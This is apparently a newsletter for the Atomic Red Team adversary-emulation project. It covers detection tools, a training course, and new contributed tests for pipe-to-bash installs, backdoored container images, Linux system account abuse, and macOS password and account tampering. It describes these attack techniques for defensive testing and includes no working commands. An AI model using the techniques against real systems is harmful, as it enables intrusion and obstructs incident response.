The security mastermind himself has gone nuclear! John Hammond gives a ground-up overview of the BlueSpawn open source stand-in and how it picks up on Atomic Red Team tests. Speaking on the greatness of MITRE’s ATT&CK framework and defense logic, John’s insights are unique and a fun listen.

It’s here: Mac Monitor is a new free tool for collection and dynamic system analysis on macOS endpoints. Using common macOS atomic tests, Mac Monitor provides simple and friendly output to examine forensic artifacts left behind on compromised systems. In this blog, we execute a test harness for AppleScript to showcase enhanced telemetry collection from this behavior.

Another excellent AntiSyphon training from maintainer Carrie Roberts is open for registration! This course is for all experience levels and covers attack emulation and visualization, including Atomic Red Team, Caldera, Vectr, and more—perfect for both seasoned and aspiring security practitioners.

Researcher and maintainer Jose Hernandez writes about integrating atomic testing with Lacework to create powerful detections and customizing LQL policies.

These new tests contributed by biot-2131 emulate piped commands into the Unix shell. An adversary may develop a useful utility or subvert the CI/CD pipeline of a legitimate utility developer that requires or suggests installing their utility by piping a curl download directly into bash. The adversary may also take advantage of this BLIND install method and selectively run extra commands in the install script.

Contributor msdlearn has added a new test that emulates an adversary’s backdoored/malicious image, a common strategy in cloud and containerized environments. This is used to skip the Initial Access phase and leads to execution of malicious code or cryptocurrency mining.

Another set of tests from contributor biot-2131 tests the creation, reactivation, and repurposing of system accounts on Linux systems. This can allow for lateral movement across a network or to escalate privileges.

Contributor D4rkCiph3r has added a series of tests that change user passwords and delete user accounts using dscl and sysadminctl. These techniques can impede incident response and recovery efforts during certain types of attacks, especially ransomware.